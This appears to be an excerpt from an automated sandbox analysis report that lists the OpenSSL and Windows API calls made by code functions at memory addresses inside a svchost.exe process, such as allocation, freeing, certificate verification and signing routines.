Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,53_2_00007FFDA333D68B
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3389730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3389730
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA333DAA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33223C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33223C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33551E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,53_2_00007FFDA33551E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,53_2_00007FFDA3373200
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3341210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,53_2_00007FFDA3341210
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,53_2_00007FFDA332B0B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33550D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,53_2_00007FFDA33550D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,53_2_00007FFDA3335070
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A1090
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3339120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,53_2_00007FFDA3339120
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3371127 CRYPTO_realloc,53_2_00007FFDA3371127
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334D140 CRYPTO_free,CRYPTO_malloc,53_2_00007FFDA334D140
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,53_2_00007FFDA339B140
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33910E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33910E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,53_2_00007FFDA337F0F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335D100 CRYPTO_free,53_2_00007FFDA335D100
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3395760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3395760
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,53_2_00007FFDA3335780
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3333820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,53_2_00007FFDA3333820
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3343840
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,53_2_00007FFDA3335840
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,53_2_00007FFDA3329850
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33916B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA33916B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33236C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,53_2_00007FFDA33236C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33876D0 CRYPTO_free,53_2_00007FFDA33876D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33736D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33736D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33556D0 CRYPTO_zalloc,53_2_00007FFDA33556D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321740 CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA3321740
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,53_2_00007FFDA339B6E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3333700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3333700
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33895A0 CRYPTO_free,53_2_00007FFDA33895A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33475B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,53_2_00007FFDA33475B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33235C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,53_2_00007FFDA33235C8
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33215D0 CRYPTO_free,53_2_00007FFDA33215D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33775D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33775D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329590 CRYPTO_free,CRYPTO_memdup,53_2_00007FFDA3329590
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B590 CRYPTO_free,53_2_00007FFDA338B590
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3389620 CRYPTO_malloc,ERR_new,ERR_set_debug,53_2_00007FFDA3389620
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343650 CRYPTO_THREAD_unlock,53_2_00007FFDA3343650
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33A1650
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B5E0 CRYPTO_free,53_2_00007FFDA338B5E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B5F0 CRYPTO_free,53_2_00007FFDA335B5F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,53_2_00007FFDA338D5F0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B4A0 CRYPTO_free,CRYPTO_free,53_2_00007FFDA338B4A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B4B0 CRYPTO_zalloc,53_2_00007FFDA335B4B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3389540 OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA3389540
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3345550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,53_2_00007FFDA3345550
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33AB550
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33434E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,53_2_00007FFDA33434E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338D4E0 ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA338D4E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33974E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33974E0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332B500 CRYPTO_free,53_2_00007FFDA332B500
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3335500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA3335500
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3373C30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3323C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3323C40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33A9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA33A9C40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,53_2_00007FFDA3329C50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321C50 CRYPTO_zalloc,53_2_00007FFDA3321C50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321BE0 CRYPTO_zalloc,53_2_00007FFDA3321BE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3327BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3327BEE
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA333BC10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,53_2_00007FFDA339BAA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3361A60 CRYPTO_free,53_2_00007FFDA3361A60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343A70 CRYPTO_get_ex_data,53_2_00007FFDA3343A70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3333A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3333A70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,53_2_00007FFDA3399B33
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA3399B4A
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3347B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,53_2_00007FFDA3347B50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336BB00 CRYPTO_free,53_2_00007FFDA336BB00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33619A0 CRYPTO_malloc,53_2_00007FFDA33619A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33999B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA33999B3
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33579D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33579D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,53_2_00007FFDA3399985
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,53_2_00007FFDA339999C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,53_2_00007FFDA3329A20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA337DA40 CRYPTO_memcmp,53_2_00007FFDA337DA40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,53_2_00007FFDA332DA50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33938C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,53_2_00007FFDA33938C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B8C0 CRYPTO_free,53_2_00007FFDA338B8C0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33818D0 CRYPTO_free,53_2_00007FFDA33818D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA335B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA335B8D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33578D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA33578D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA339985F
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3327870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,53_2_00007FFDA3327870
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338B870 CRYPTO_free,53_2_00007FFDA338B870
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,53_2_00007FFDA3387920
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3331950 CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA3331950
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33718E9 CRYPTO_malloc,CRYPTO_free,53_2_00007FFDA33718E9
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3355FA0 CRYPTO_realloc,53_2_00007FFDA3355FA0
